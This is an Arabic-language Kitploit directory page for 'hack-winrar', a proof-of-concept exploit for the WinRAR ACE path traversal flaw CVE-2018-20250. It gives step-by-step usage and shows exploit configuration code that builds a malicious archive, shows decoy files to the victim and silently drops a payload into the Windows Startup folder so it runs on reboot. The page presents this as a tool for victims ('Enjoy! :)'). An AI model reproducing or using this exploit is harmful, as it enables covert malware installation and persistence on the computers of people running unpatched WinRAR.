Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
hack-winrar — WinRar هو برنامج معروف جداً لنظام Windows. الإصدار السابق من WinRaR كان يحتوي على ثغرة أمنية تم إصلاحها في فبراير 2019. معظم الأشخاص لم يقوموا بتحديث WinRAR لذا فهم عرضة لثغرة تجاوز المسار المطلق [CVE-2018-20250] | Kitploit
أدوات/GitHubGitHub/technicaldada/hack-winrar
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubtechnicaldada/hack-winrar

hack-winrar

WinRar هو برنامج معروف جداً لنظام Windows. الإصدار السابق من WinRaR كان يحتوي على ثغرة أمنية تم إصلاحها في فبراير 2019. معظم الأشخاص لم يقوموا بتحديث WinRAR لذا فهم عرضة لثغرة تجاوز المسار المطلق [CVE-2018-20250]

عرض المستودع
11منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
الموقع الإلكتروني
مشاركة

hack-winrar

WinRar هو برنامج معروف جداً على نطاق واسع لنظام ويندوز. الإصدارات السابقة من WinRaR كانت تحوي ثغرة أمنية تم إصلاحها في فبراير 2019. معظم الأشخاص لم يقوموا بتحديث winrar لذلك لا يزالون عرضة لثغرة مسار الاختراق المطلق (Absolute Path Traversal) هذه [CVE-2018-20250]

استغلال لـ استخراج تنفيذ الكود من Winrar

poc بواسطة Ridter

كيف تستخدمها؟

كل ما تحتاجه هو تثبيت بايثون 3.7، وتجهيز ملف خبيث تريد تشغيله، وضبط القيم التي تريدها، سوف تقوم سكربت الاستغلال هذا بتوليد ملف الأرشيف الخبيث تلقائياً!

  1. اضبط القيم التي تريدها
root@kitploit:~
... ...

# اسم ملف الأرشيف الذي تريده
rar_filename = "test.rar"
# الملف الخبيث الذي تريده أن يعمل
evil_filename = "calc.exe"
# مسار فك الضغط الذي تريده، كما هو موضح بالأسفل
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# ملفات أخرى لتظهر عند فتح الضحية لملف الـ winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # هذا الأمر قد يختلف، يعتمد على بيئة بايثون 3 الخاصة بك.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. قم بتشغيل الاستغلال، سيقوم الاستغلال بتوليد ملف test.rar تلقائياً

  1. إذا فتح الضحية ملف test.rar، سيرى الملف hello.txt و world.txt، يمكنك أيضاً إضافة المزيد من الملفات، ملفات أكثر جاذبية.

  1. عندما يقوم بفك ضغط الملف، سيكون في مجلد بدء التشغيل الخاص بالمستخدم ملف إضافي باسم hi.exe، لكنه في الحقيقة calc.exe. عندما يعيد تشغيل الحاسوب، سيتم تشغيل hi.exe.

استمتع! :)

تنزيل الأداة